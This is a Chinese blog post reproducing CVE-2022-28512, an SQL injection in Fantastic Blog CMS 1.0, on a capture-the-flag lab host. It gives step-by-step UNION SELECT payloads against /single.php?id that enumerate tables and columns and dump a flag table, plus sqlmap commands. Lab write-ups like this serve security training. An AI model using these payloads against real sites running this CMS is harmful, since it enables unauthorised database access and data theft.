【漏洞复现】Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)

Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)


0x01 靶场介绍

Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。

0x02 影响版本

Fantastic Blog CMS 1.0 版本

0x03 具体步骤

进入靶场,界面如下:

直接访问/single.php?id=1

按流程走,单引号闭合时出现错误回显

/single.php?id=2%27

order by 1页面显示正常,而order by 10时不正常,判断有10列

/single.php?id=2%27order%20by%2010--+

发现回显位2,4

/single.php?id=.2%27union%20select%201,2,3,4,5,6,7,8,9--+

当前数据库库名为ctf

继续查表名

/single.php?id=.2%27union%20select%201,2,3,group_concat(table_name),5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+

发现有个表名flag,继续查列

/single.php?id=.2%27union%20select%201,2,3,group_concat(column_name),5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+

继续找flag

/single.php?id=.2%27union%20select%201,2,3,group_concat(flag),5,6,7,8,9%20from%20flag--+

成功找到flag

0x04 使用sqlmap

sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" --dbs

sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf --tables

sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf -T flag --dump

0x05 总结

平平无奇的一场注入,没有任何屏蔽,不需要考虑绕过,典型的SQL注入流程。


posted @ 2023-03-15 22:26  0dot7  阅读(507)  评论(0编辑  收藏  举报